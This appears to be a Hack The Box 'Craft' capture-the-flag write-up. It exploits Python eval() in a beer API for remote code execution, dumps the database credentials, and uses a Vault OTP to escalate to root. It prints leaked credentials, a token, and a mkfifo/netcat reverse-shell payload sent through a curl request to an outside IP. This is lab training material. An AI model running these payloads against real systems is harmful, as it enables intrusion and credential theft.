Hack The Box - Craft

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled.png

NMAP :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%201.png

Enumerating web :

→ We found an repo :

https://gogs.craft.htb/Craft/craft-api

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%202.png

⇒ We found an interesting commit which contains the api subdomain and credentials :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%203.png

→ Credentials : dinesh : 4aUh0A8PbVJxgd

→ The API subdomain : https://api.craft.htb/api/

⇒ When reading the scripts we found an vulnerability in brew function :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%204.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%205.png

→ Python eval function is vulnerable to RCE . More about it on an post by Vickie Li :

https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1

Exploiting Brew Function in the API to get RCE

⇒ First we will have to generate an token using the credentials we previously found :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%206.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%207.png

⇒ We previously saw abv has the eval function so we will be exploiting it. So lets go create new brew :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%208.png

⇒ Lets create new brew :

→ Payload :

__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 4444 >/tmp/f')=

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%209.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2010.png

→ Now all we have to do is add our token to this curl command and run it :

curl -k -X POST "[https://api.craft.htb/api/brew/](https://api.craft.htb/api/brew/)" -H 'X-Craft-API-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZGluZXNoIiwiZXhwIjoxNTk3OTQzNzY1fQ.zJbnFPZlJJCyV9zcVuvZ8j5FbeWC_ZWxPNtIMP_lWew' -H "accept: application/json" -H "Content-Type: application/json" -d "{ \"id\": 0, \"brewer\": \"string\", \"name\": \"string\", \"style\": \"string\", \"abv\": \"__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 4444 >/tmp/f') \"}"

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2011.png

→ We are not root yet we’re in a docker container.

⇒ Enumerating files. Inspecting dbtest.py :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2012.png

→ The following python script performs SQL Queries when ran. We have write access to it.

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2013.png

→ We will edit cursor.fetchone() to cursor.fetchall() . Also edit the sql query to display tables

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2014.png

→ Running it we see that there are two tables brew and user

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2015.png

→ Lets select everything from user table :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2016.png

→ When we run it we get password of all the accounts :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2017.png

⇒ Logged in as gilfoyle user and found ssh keys :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2018.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2019.png

⇒ SSH’ed in as user gilfoyle. Password of ssh key was same as the password of user we found earlier :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2020.png

Privilege Escalation to root

⇒ In gilfoyle user repository we found the following :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2021.png

→ We can use vault to generate an OTP for us to ssh in as root.

→ We can authenticate to the vault using the vault-token in user home directory :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2022.png

vault login token=f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2023.png

⇒ Lets create an otp then ssh in as root :

Reference : https://www.vaultproject.io/docs/secrets/ssh/one-time-ssh-passwords

vault write ssh/creds/root_otp ip=127.0.0.1

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2024.png

→ Now we can use the key to ssh in as root on localhost :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Craft%20Box%20907b81d306cb4c76a51b1a523af97fab/Untitled%2025.png

ROOTED